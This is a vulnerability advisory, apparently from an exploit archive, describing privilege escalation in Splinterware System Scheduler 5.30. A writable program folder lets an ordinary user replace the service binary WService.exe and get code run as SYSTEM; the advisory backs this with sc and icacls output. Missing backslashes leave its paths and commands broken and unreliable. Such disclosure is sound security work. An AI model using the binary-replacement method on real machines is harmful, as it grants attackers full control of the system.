Authored by Andrea Intilangelo

Splinterware System Scheduler Professional version 5.30 suffers an unquoted service path vulnerability.

# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path
# Date: 2021-05-11
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.splinterware.com
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Version: 5.30 Professional
# Tested on: Windows 10 Pro 20H2 x64

System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
elevated privileges (system level privileges as "nt authoritysystem") since the service runs as Local System;
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
will be executed after a short while.

C:Userstest>sc qc WindowsScheduler
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: WindowsScheduler
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 0   IGNORE
        NOME_PERCORSO_BINARIO     : C:PROGRA~2SYSTEM~1WService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : System Scheduler Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

C:Userstest>icacls C:PROGRA~2SYSTEM~1
C:PROGRA~2SYSTEM~1 BUILTINUsers:(RX,W)
                      BUILTINUsers:(OI)(CI)(IO)(GR,GW,GE)
                      NT SERVICETrustedInstaller:(I)(F)
                      NT SERVICETrustedInstaller:(I)(CI)(IO)(F)
                      NT AUTHORITYSYSTEM:(I)(F)
                      NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F)
                      BUILTINAdministrators:(I)(F)
                      BUILTINAdministrators:(I)(OI)(CI)(IO)(F)
                      BUILTINUsers:(I)(RX)
                      BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE)
                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                      AUTORITÀ PACCHETTI APPLICAZIONITUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
                      AUTORITÀ PACCHETTI APPLICAZIONITUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
                      AUTORITÀ PACCHETTI APPLICAZIONITUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
                      AUTORITÀ PACCHETTI APPLICAZIONITUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)

Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file

C:Userstest>

RELATED ARTICLESMORE FROM AUTHOR